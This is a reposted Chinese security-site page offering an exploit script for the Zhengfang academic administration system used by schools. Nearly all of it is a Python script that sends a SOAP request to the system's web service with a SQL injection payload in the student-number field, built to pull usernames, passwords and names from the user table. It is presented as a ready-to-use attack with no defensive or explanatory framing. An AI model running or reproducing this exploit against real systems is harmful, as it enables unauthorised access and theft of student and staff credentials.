正方教务系统漏洞利用exp

颓废 2019年5月19日09:48:45评论1,375 views2字数 1789阅读5分57秒阅读模式
#!/usr/bin/env python # -*- coding: utf-8 -*- #author: Windy import os import re import sys import urllib2  import httplib  import random import time import string import requests from bs4 import BeautifulSoup def SendRtx(payload,xnxq,strKey):  SENDTPL = '''<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"     xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">   <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">     <q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo">       <xh xsi:type="xsd:string">%s</xh>       <xnxq xsi:type="xsd:string">%s</xnxq>       <strKey xsi:type="xsd:string">%s</strKey>     </q1:GetStuCheckinInfo>   </soap:Body> </soap:Envelope>'''  SoapMessage = SENDTPL % (payload,xnxq,strKey)  webservice = httplib.HTTP("xxx.xxx.xxx.xxx")  webservice.putrequest("POST", "/service.asmx HTTP/1.1")  webservice.putheader("Host", "xxx.xxx.xx.xxx")  webservice.putheader("Content-type", "text/xml; charset=utf-8")  webservice.putheader("Content-length", "%d" % len(SoapMessage))  webservice.putheader("SOAPAction", "/"http://www.zf_webservice.com/GetStuCheckinInfo /"")  webservice.endheaders()  webservice.send(SoapMessage)  #get the response  statuscode, statusmessage, header = webservice.getreply()  return statuscode, statusmessage, header      if __name__ == '__main__':  path='C://Users//SpId3r//Desktop//get.txt'  payload="222222' union select YHM,KL,XM,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from YHB where 'a'='a"  xnxq="2013-2014-1"  strKey="KKKGZ2312"  print SendRtx(payload,xnxq,strKey)

EXP作者:WINDY

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:48:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   正方教务系统漏洞利用exphttp://cn-sec.com/archives/68327.html

发表评论

匿名网友 填写信息